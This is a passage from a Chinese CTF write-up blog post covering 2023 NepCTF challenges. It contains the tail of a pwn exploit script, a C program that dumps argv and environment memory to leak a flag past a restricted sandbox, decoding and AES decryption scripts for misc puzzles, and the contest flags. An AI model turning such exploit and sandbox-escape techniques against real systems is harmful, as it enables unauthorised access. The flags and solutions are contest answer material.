class="string">b&#x27;Login\n&#x27;</span>*<span class="number">0x517</span>)</span><br><span class="line"></span><br><span class="line">sl(<span class="string">b&#x27;\nSafe_Mode_Key&#x27;</span>)</span><br><span class="line"></span><br><span class="line">ia()</span><br></pre></td></tr></table></figure>

<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308151840784.png" alt="image-20230815143957697"></p>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="checkin"><a href="#checkin" class="headerlink" title="checkin"></a>checkin</h2><p>一个号只能发一次，第一次发错了….（哭）</p>
<p>NepCTF{H4ve_Fun_1N_This_Game}</p>
<h2 id="与AI共舞的哈夫曼"><a href="#与AI共舞的哈夫曼" class="headerlink" title="与AI共舞的哈夫曼"></a><strong>与AI共舞的哈夫曼</strong></h2><p>年轻人就要年轻，正经人谁自己做题啊~x</p>
<p>GPT秒了</p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140017820.png" alt="image-20230814001753757"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> heapq</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">HuffmanNode</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, char, freq</span>):</span><br><span class="line">        self.char = char</span><br><span class="line">        self.freq = freq</span><br><span class="line">        self.left = <span class="literal">None</span></span><br><span class="line">        self.right = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__lt__</span>(<span class="params">self, other</span>):</span><br><span class="line">        <span class="keyword">return</span> self.freq &lt; other.freq</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">build_huffman_tree</span>(<span class="params">frequencies</span>):</span><br><span class="line">    heap = [HuffmanNode(char, freq) <span class="keyword">for</span> char, freq <span class="keyword">in</span> frequencies.items()]</span><br><span class="line">    heapq.heapify(heap)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="built_in">len</span>(heap) &gt; <span class="number">1</span>:</span><br><span class="line">        left = heapq.heappop(heap)</span><br><span class="line">        right = heapq.heappop(heap)</span><br><span class="line">        merged = HuffmanNode(<span class="literal">None</span>, left.freq + right.freq)</span><br><span class="line">        merged.left = left</span><br><span class="line">        merged.right = right</span><br><span class="line">        heapq.heappush(heap, merged)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> heap[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">build_huffman_codes</span>(<span class="params">node, current_code, huffman_codes</span>):</span><br><span class="line">    <span class="keyword">if</span> node <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> node.char <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span>:</span><br><span class="line">        huffman_codes[node.char] = current_code</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">    build_huffman_codes(node.left, current_code + <span class="string">&#x27;0&#x27;</span>, huffman_codes)</span><br><span class="line">    build_huffman_codes(node.right, current_code + <span class="string">&#x27;1&#x27;</span>, huffman_codes)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">compress</span>(<span class="params">input_file, output_file</span>):</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(input_file, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        data = f.read()</span><br><span class="line"></span><br><span class="line">    frequencies = &#123;&#125;</span><br><span class="line">    <span class="keyword">for</span> byte <span class="keyword">in</span> data:</span><br><span class="line">        <span class="keyword">if</span> byte <span class="keyword">not</span> <span class="keyword">in</span> frequencies:</span><br><span class="line">            frequencies[byte] = <span class="number">0</span></span><br><span class="line">        frequencies[byte] += <span class="number">1</span></span><br><span class="line"></span><br><span class="line">    root = build_huffman_tree(frequencies)</span><br><span class="line">    huffman_codes = &#123;&#125;</span><br><span class="line">    build_huffman_codes(root, <span class="string">&#x27;&#x27;</span>, huffman_codes)</span><br><span class="line"></span><br><span class="line">    compressed_data = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> byte <span class="keyword">in</span> data:</span><br><span class="line">        compressed_data += huffman_codes[byte]</span><br><span class="line"></span><br><span class="line">    padding = <span class="number">8</span> - <span class="built_in">len</span>(compressed_data) % <span class="number">8</span></span><br><span class="line">    compressed_data += <span class="string">&#x27;0&#x27;</span> * padding</span><br><span class="line"></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(output_file, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="comment"># Write frequency information</span></span><br><span class="line">        f.write(<span class="built_in">bytes</span>([<span class="built_in">len</span>(frequencies)]))</span><br><span class="line">        <span class="keyword">for</span> byte, freq <span class="keyword">in</span> frequencies.items():</span><br><span class="line">            f.write(<span class="built_in">bytes</span>([byte, (freq &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xFF</span>, (freq &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xFF</span>, (freq &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xFF</span>, freq &amp; <span class="number">0xFF</span>]))</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Write compressed data</span></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(compressed_data), <span class="number">8</span>):</span><br><span class="line">            byte = compressed_data[i:i+<span class="number">8</span>]</span><br><span class="line">            f.write(<span class="built_in">bytes</span>([<span class="built_in">int</span>(byte, <span class="number">2</span>)]))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decompress</span>(<span class="params">compressed_file, decompressed_file</span>):</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(compressed_file, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="comment"># 读取频率信息</span></span><br><span class="line">        num_symbols = <span class="built_in">int</span>.from_bytes(f.read(<span class="number">1</span>), byteorder=<span class="string">&#x27;big&#x27;</span>)</span><br><span class="line">        frequencies = &#123;&#125;</span><br><span class="line">        <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(num_symbols):</span><br><span class="line">            byte, freq1, freq2, freq3, freq4 = f.read(<span class="number">5</span>)</span><br><span class="line">            freq = (freq1 &lt;&lt; <span class="number">24</span>) | (freq2 &lt;&lt; <span class="number">16</span>) | (freq3 &lt;&lt; <span class="number">8</span>) | freq4</span><br><span class="line">            frequencies[byte] = freq</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 构建哈夫曼树</span></span><br><span class="line">        root = build_huffman_tree(frequencies)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 解压缩数据</span></span><br><span class="line">        current_node = root</span><br><span class="line">        decompressed_data = <span class="built_in">bytearray</span>()</span><br><span class="line">        <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">            bit = f.read(<span class="number">1</span>)</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> bit:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">            bit = <span class="built_in">int</span>.from_bytes(bit, byteorder=<span class="string">&#x27;big&#x27;</span>)</span><br><span class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>, -<span class="number">1</span>, -<span class="number">1</span>):</span><br><span class="line">                <span class="keyword">if</span> current_node.char <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span>:</span><br><span class="line">                    decompressed_data.append(current_node.char)</span><br><span class="line">                    current_node = root</span><br><span class="line"></span><br><span class="line">                <span class="keyword">if</span> (bit &gt;&gt; i) &amp; <span class="number">1</span> == <span class="number">1</span>:</span><br><span class="line">                    current_node = current_node.right</span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    current_node = current_node.left</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 写入解压缩后的数据</span></span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(decompressed_file, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> output_f:</span><br><span class="line">            output_f.write(decompressed_data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    input_file = <span class="string">&#x27;input.txt&#x27;</span></span><br><span class="line">    compressed_file = <span class="string">&#x27;compressed.bin&#x27;</span></span><br><span class="line">    decompressed_file = <span class="string">&#x27;decompressed.txt&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># 解压缩文件</span></span><br><span class="line">    decompress(compressed_file, decompressed_file)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308141025369.png" alt="image-20230814101049586"></p>
<h2 id="codes"><a href="#codes" class="headerlink" title="codes"></a>codes</h2><p>各种尝试想要提权结果没一个函数有用的，system,getenv,mprotect甚至read甚至env本身全都禁掉了</p>
<p>只好直接输出，想到函数参数依次入栈，而env环境变量也是main函数的一个参数，从而想到在argc的基础上++移动指针，暴力输出大量数据，从中找到flag</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">( <span class="type">int</span> argc, <span class="type">char</span> *argv[])</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">for</span> （<span class="type">int</span> i = <span class="number">0</span>; i&lt; argc; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">for</span>(<span class="type">int</span> j = <span class="number">0</span>;j&lt;<span class="number">700</span>;++j)</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%d&#x27;: %s n&quot;</span>, i, argv［ i 」 + j );</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><del>（优雅）</del></p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308151126222.png" alt="image-20230814002546260"></p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140026993.png" alt="image-20230814002608949"></p>
<h2 id="小叮弹钢琴"><a href="#小叮弹钢琴" class="headerlink" title="小叮弹钢琴"></a>小叮弹钢琴</h2><p>mid音频隐写（我思考velato这样的音符编程语言尝试了好久最后发现就是个隐写？？）</p>
<p>前半段是短音符和长音符，判断是摩斯电码，后面的是一串十六进制数字</p>
<p>摩斯电码解码得到tip：youshouldusethistoxorsomething</p>
<p>真，一开始断句成了this tox or something （甚至找了半天tox是啥）</p>
<p>接下来异或卡了好久，愣是没想到是用这句话去异或</p>
<p>之后联想前几个字母是NepCTF，尝试发现与之异或的是you，才发现把youshouldusethistoxorsomething这句话去异或0x370a05303c290e045005031c2b1858473a5f052117032c39230f005d1e17就行了</p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140038661.png" alt="image-20230814003810621"></p>
<h2 id="陌生的语言"><a href="#陌生的语言" class="headerlink" title="陌生的语言"></a>陌生的语言</h2><p>由给出的hint可知是小魔女学园的月文和龙语。</p>
<p>纯粹的信息收集了</p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140038297.jpg"></p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308141000511.jpg" alt="img"></p>
<p>NepCTF{NEPNEP_A_BELIEVING_Heart_is_your_magic}</p>
<h2 id="ConnectedFive"><a href="#ConnectedFive" class="headerlink" title="ConnectedFive"></a>ConnectedFive</h2><p>真的是下棋下出来的</p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140050622.png" alt="image-20230814005007869"></p>
<h2 id="你也喜欢三月七么"><a href="#你也喜欢三月七么" class="headerlink" title="你也喜欢三月七么"></a>你也喜欢三月七么</h2><p>题目所给附件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">salt_lenth= <span class="number">10</span> </span><br><span class="line">key_lenth= <span class="number">16</span> </span><br><span class="line">iv= 88219bdee9c396eca3c637c0ea436058 <span class="comment">#原始iv转hex的值</span></span><br><span class="line">ciphertext= </span><br><span class="line">b700ae6d0cc979a4401f3dd440bf9703b292b57b6a16b79ade01af58025707fbc29941105d7f50f2657cf7eac735a800ecccdfd42bf6c6ce3b00c8734bf500c819e99e074f481dbece626ccc2f6e0562a81fe84e5dd9750f5a0bb7c20460577547d3255ba636402d6db8777e0c5a429d07a821bf7f9e0186e591dfcfb3bfedfc</span><br></pre></td></tr></table></figure>

<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308292027548.png" alt="image-20230829202743433"></p>
<p>看上去是AES，根据题目：</p>
<p>salt&#x3D;NepCTF2023</p>
<p>salt用sha256加密后得到key，解得sha256（salt）&#x3D; dd8e671df3882c5be6423cd030bd7cb69671ef27dfe7a541903edc4e23168009</p>
<p>截取前十六位为key</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"></span><br><span class="line">key = <span class="string">&#x27;dd8e671df3882c5be6423cd030bd7cb69671ef27dfe7a541903edc4e23168009&#x27;</span></span><br><span class="line">iv_hex = <span class="string">&#x27;88219bdee9c396eca3c637c0ea436058&#x27;</span> <span class="comment">#原始iv转hex的值</span></span><br><span class="line">ciphertext= <span class="string">&#x27;&#x27;&#x27;b700ae6d0cc979a4401f3dd440bf9703b292b57b6a16b79ade01af58025707fbc29941105d7f50f2657cf7eac735a800ecccdfd42bf6c6ce3b00c8734bf500c819e99e074f481dbece626ccc2f6e0562a81fe84e5dd9750f5a0bb7c20460577547d3255ba636402d6db8777e0c5a429d07a821bf7f9e0186e591dfcfb3bfedfc&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 把hex值转成bytes</span></span><br><span class="line">iv = <span class="built_in">bytes</span>.fromhex(iv_hex)</span><br><span class="line">key = <span class="built_in">bytes</span>.fromhex(key)[:<span class="number">16</span>]</span><br><span class="line">ciphertext = <span class="built_in">bytes</span>.fromhex(ciphertext)</span><br><span class="line"></span><br><span class="line">aes = AES.new(key, AES.MODE_CBC, iv)</span><br><span class="line">plaintext = aes.decrypt(ciphertext)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;plaintext:&#x27;</span>, plaintext)</span><br><span class="line"><span class="comment"># plaintext: b&#x27;6148523063484d364c793970625763784c6d6c745a3352774c6d4e76625338794d44497a4c7a41334c7a49304c336c5061316858553070554c6e42755a773d3d&#x27;</span></span><br></pre></td></tr></table></figure>

<p>base64解码得到url</p>
<p>解压压缩包得</p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308292030306.png" alt="image-20230829203026261"></p>
<p>找了找星铁的文字</p>
<p>对找得到flag</p>
<p>NepCTF{HRP_aIways_likes_March_7th}</p>

    </div>

    
    
    

<div> 
	 
		<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------文章就到这里啦！<i class="fa fa-paw"></i>感谢您的阅读XD-------------</div>
    
</div> 
	 
</div>

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>lmarch2
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://lmarch2.github.com/posts/0/" title="2023NepCTF WP">http://lmarch2.github.com/posts/0/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">

 <div class="post-tags">
              <a href="/tags/ctf/" rel="tag"><i class="fa fa-tag"></i> ctf</a>
          </div>
          <script type="text/javascript">
            var tagsall=document.getElementsByClassName("post-tags")
            for (var i = tagsall.length - 1; i >= 0; i--){
                var tags=tagsall[i].getElementsByTagName("a");
                for (var j = tags.length - 1; j >= 0; j--) {
                    var golden_ratio = 0.618033988749895;
                    var s = 0.5;
                    var v = 0.999;
                    var h = golden_ratio + Math.random()*0.8 - 0.5;
                    var h_i = parseInt(h * 6);
                    var f = h * 6 - h_i;
                    var p = v * (1 - s);
                    var q = v * (1 - f * s);
                    var t = v * (1 - (1 - f) * s);
                    var r, g, b;
                    switch (h_i) {
                        case 0:
                            r = v;
                            g = t;
                            b = p;
                            break;
                        case 1:
                            r = q;
                            g = v;
                            b = p;
                            break;
                        case 2:
                            r = p;
                            g = v;
                            b = t;
                            break;
                        case 3 :
                            r = p;
                            g = q;
                            b = v;
                            break;
                        case 4:
                            r = t;
                            g = p;
                            b = v;
                            break;
                        case 5:
                            r = v;
                            g = p;
                            b = q;
                            break;
                        default:
                            r = 1;
                            g = 1;
                            b = 1;
                      }
                    tags[j].style.background = "rgba("+parseInt(r*255)+","+parseInt(g*255)+","+parseInt(b*255)+","+0.5+")";
                }
            }                        
            </script>


              <a href="/tags/ctf/" rel="tag"><i class="fa fa-tag"></i> ctf</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/posts/c63e16b3/" rel="prev" title="week6-T1">
                  <i class="fa fa-chevron-left"></i> week6-T1
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/posts/6121198a/" rel="next" title="PWN一些用到的指令和工具">
                  PWN一些用到的指令和工具 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lmarch2</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">213k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">3:13</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div><script color="0,255,0" opacity="0.5" zIndex="-1" count="150" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>

<script type="text/javascript" src="/js/click_firework.js"></script>


<div>
  <span id="sitetime"></span>
  <script language=javascript>
      function siteTime(){
          window.setTimeout("siteTime()", 1000);
          var seconds = 1000;
          var minutes = seconds * 60;
          var hours = minutes * 60;
          var days = hours * 24;
          var years = days * 365;
          var today = new Date();
          var todayYear = today.getFullYear();
          var todayMonth = today.getMonth()+1;
          var todayDate = today.getDate();
          var todayHour = today.getHours();
          var todayMinute = today.getMinutes();
          var todaySecond = today.getSeconds();
          /* 
          Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
          year - 作为date对象的年份，为4位年份值
          month - 0-11之间的整数，做为date对象的月份
          day - 1-31之间的整数，做为date对象的天数
          hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
          minutes - 0-59之间的整数，做为date对象的分钟数
          seconds - 0-59之间的整数，做为date对象的秒数
          microseconds - 0-999之间的整数，做为date对象的毫秒数
      */
          var t1 = Date.UTC(2023,1,12,00,00,00); //北京时间2018-2-13 00:00:00
          var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
          var diff = t2-t1;
      var diffYears = Math.floor(diff/years);
      var diffDays = Math.floor((diff/days)-diffYears*365);
      var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
      var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
      var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
      document.getElementById("sitetime").innerHTML=" 已运行"+/*diffYears+" 年 "+*/diffDays+" 天 "+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒";
    }
      siteTime();
  </script>
</div>


    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/lmarch2" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script><script src="/js/bookmark.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>


  <script class="next-config" data-name="mermaid" type="application/json">{"enable":true,"theme":{"light":"default","dark":"dark"},"js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mermaid/9.3.0/mermaid.min.js","integrity":"sha256-QdTG1YTLLTwD3b95jLqFxpQX9uYuJMNAtVZgwKX4oYU="}}</script>
  <script src="/js/third-party/tags/mermaid.js"></script>


  <script src="/js/third-party/pace.js"></script>

  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>

//Aplayer播放器
<link rel="stylesheet" href="/dist/APlayer.css">
<div id="aplayer"></div>
<script type="text/javascript" src="/dist/APlayer.min.js"></script>
<script type="text/javascript" src="/dist/music.js"></script>
